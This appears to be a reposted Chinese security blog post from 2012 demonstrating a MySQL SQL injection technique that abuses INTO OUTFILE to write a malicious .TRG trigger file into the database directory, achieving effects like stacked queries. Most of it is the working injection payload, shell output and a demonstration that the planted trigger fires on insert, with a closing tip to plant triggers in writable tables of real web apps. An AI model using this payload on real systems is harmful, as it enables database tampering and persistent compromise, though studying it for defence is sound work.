文/superhei 2012-06-04 最早与2010年在wisec看到这个利用:http://www.wisec.it/sectou.php?id=4bced661462bd 当时一直没有去测试,今天测试了一下。记录一下 :) 这种利用场景主要适合于数据库web分离的拥有file权限写文件并可注射的情况。具体要求: 1、web应用连接数据库用户拥有file权限。 2、拥有一个不受魔术引号的注射点。 3、数据库web分离,因为没有分离就可以直接导出webshell了:) 效果:可以实现多语句执行。这个就意味着可以又select实现update insert等操作,这个可能利用2次 漏洞 实现对webapp实行更大效果攻击。 测试过程: 本地有个表: mysql > desc aa.article; www.2cto.com +-----------+--------------+------+-----+---------+----------------+ | Field | Type | Null | Key | Default | Extra | +-----------+--------------+------+-----+---------+----------------+ | articleid | int(11) | NO | PRI | NULL | auto_increment | | title | varchar(100) | NO | | | | | content | text | NO | | NULL | | +-----------+--------------+------+-----+---------+----------------+ 3 rows in set (0.01 sec) 执行语句: select * from article where articleid=3 and 1=2 union select null,null,'TYPE=TRIGGERS' into outfile '/var/lib/mysql/aa/article.TRG' LINES TERMINATED BY '\ntriggers=\'CREATE DEFINER=`root`@`localhost` trigger atk after insert on user for each row\\nbegin\\nselect 1111 into outfile \\\'/tmp/aa.txt\\\';\\nend\'\nsql_modes=0\ndefiners=\'root@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n'; mysql> select * from article where articleid=3 and 1=2 union select null,null,'TYPE=TRIGGERS' into outfile -> '/var/lib/mysql/aa/article.TRG' LINES TERMINATED BY '\ntriggers=\'CREATE DEFINER=`root`@`localhost` trigger atk after insert on user for each row\\nbegin\\nselect 1111 into outfile \\\'/tmp/aa.txt\\\';\\nend\'\nsql_modes=0\ndefiners=\'root@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n'; Query OK, 1 row affected (0.04 sec) 本地文件: root@ubuntu:/var/lib/mysql/aa# cat article.TRG \N \N TYPE=TRIGGERS triggers='CREATE DEFINER=`root`@`localhost` trigger atk after insert on user for each row\nbegin\nselect 1111 into outfile \'/tmp/aa.txt\';\nend' sql_modes=0 definers='root@localhost' client_cs_names='latin1' connection_cl_names='latin1_swedish_ci' db_cl_names='latin1_swedish_ci' root@ubuntu:/var/lib/mysql/aa# ls /tmp/aa.txt ls: 无法访问/tmp/aa.txt: 没有那个文件或目录 回到mysql shell下执行: mysql> insert into article (articleid,title,content) values (20,2,3); Query OK, 1 row affected (0.00 sec) 再看看文件: root@ubuntu:/var/lib/mysql/aa# ls /tmp/aa.txt /tmp/aa.txt root@ubuntu:/var/lib/mysql/aa# cat /tmp/aa.txt 1111 在实际的web环境下,可以把触发器写在具有插入或者删除、更新权限的表里 :)
查看更多关于MySQL Stacked Queries with SQL Injection - 网站安全 -的详细内容...